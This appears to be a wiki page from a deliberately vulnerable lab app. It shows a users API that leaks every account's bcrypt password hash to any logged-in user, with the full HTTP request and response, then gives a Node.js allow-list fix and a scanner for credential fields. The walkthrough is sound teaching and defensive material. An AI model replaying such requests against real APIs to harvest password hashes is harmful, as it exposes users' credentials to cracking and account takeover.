
Sensitive Data Exposure

Sam Sanoop edited this page Oct 31, 2021 · 1 revision

Introduction

APIs often leak sensitive data through calls the developer did not anticipate, typically by returning the whole stored record when the client only needs a few fields of it.

Details

Any user (here the ordinary "test" account, as the bearer token below shows) can make a request to the users API:

GET /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjM1NzE5NDU4LCJleHAiOjE2MzU4OTIyNTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.SSlXSXbYMMjRaS_nZ0jPmfL2VPAjmmIZrhC_uvcSnyA
Connection: close
Referer: http://dvws.local/notes.html
Content-Length: 1

which reveals the bcrypt password hash of every user, including the admin account:

HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-Xw8+sEjh1vjh0KogCeUZCZSx51Q"
Date: Sun, 31 Oct 2021 22:36:46 GMT
Connection: close

{"status":200,"error":null,"result":[{"admin":true,"_id":"617f1824f47a696aa2253c3b","username":"admin","password":"$2b$10$IzyYy1Nu0E16SMjT7/erPuMvruixa5zx4UEkB.kRY3WbBfXakqBBm","__v":0},{"admin":false,"_id":"617f1824f47a696aa2253c3c","username":"test","password":"$2b$10$dvXrjBHMAp8XHtAMIxru8eagiPIavQrIS1jaoOtJgUEQbQJjyl80G","__v":0}]}
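The fix is to serialise an explicit allow-list of public fields rather than the raw datastore document. The following is an added example and not DVWS's own code: it shows the leaking shape beside a hardened one over the two records from the response above, and a small check a defender can run over any JSON response body to flag credential material. The field allow-list, the sensitive key names and the bcrypt pattern are assumptions made for this example.

```javascript
// Added example (not DVWS's own code). Plain Node.js, no dependencies.

// Constructed sample: the two user records returned by GET /api/v2/users above.
const USERS = [
  { admin: true, _id: "617f1824f47a696aa2253c3b", username: "admin",
    password: "$2b$10$IzyYy1Nu0E16SMjT7/erPuMvruixa5zx4UEkB.kRY3WbBfXakqBBm", __v: 0 },
  { admin: false, _id: "617f1824f47a696aa2253c3c", username: "test",
    password: "$2b$10$dvXrjBHMAp8XHtAMIxru8eagiPIavQrIS1jaoOtJgUEQbQJjyl80G", __v: 0 },
];

// Leaking shape: whatever the datastore returns is sent to the client verbatim,
// which is how the password hashes end up in the response body.
function listUsersVulnerable(users) {
  return { status: 200, error: null, result: users };
}

// Hardened shape: an explicit allow-list (assumed here) of fields that are safe
// to expose. Anything added to the stored document later (reset tokens, MFA
// secrets) stays out of the response by default.
const PUBLIC_USER_FIELDS = ["_id", "username", "admin"];

function toPublicUser(user) {
  const out = {};
  for (const field of PUBLIC_USER_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(user, field)) out[field] = user[field];
  }
  return out;
}

function listUsersHardened(users) {
  return { status: 200, error: null, result: users.map(toPublicUser) };
}

// Detection: walk a parsed JSON response and report keys whose name suggests a
// credential, or string values shaped like a bcrypt hash ($2a/$2b/$2y, 2-digit
// cost, 53 base64 characters). Both lists are assumptions, not exhaustive.
const SENSITIVE_KEYS = /^(password|passwd|pwd|hash|secret|token|apikey|api_key)$/i;
const BCRYPT_HASH = /^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$/;

function findSensitiveFields(value, path = "$") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findSensitiveFields(item, `${path}[${i}]`)));
  } else if (value !== null && typeof value === "object") {
    for (const [key, child] of Object.entries(value)) {
      const childPath = `${path}.${key}`;
      if (SENSITIVE_KEYS.test(key)) {
        hits.push({ path: childPath, reason: "sensitive key name" });
      } else if (typeof child === "string" && BCRYPT_HASH.test(child)) {
        hits.push({ path: childPath, reason: "bcrypt hash value" });
      }
      hits.push(...findSensitiveFields(child, childPath));
    }
  }
  return hits;
}

// Usage: compare both response shapes.
console.log("vulnerable:", findSensitiveFields(listUsersVulnerable(USERS)));
console.log("hardened:  ", findSensitiveFields(listUsersHardened(USERS)));
```

The value check matters as much as the key check: renaming the field does not make a hash safe to return, so a response scanner that only looks at key names misses the same leak under a different label.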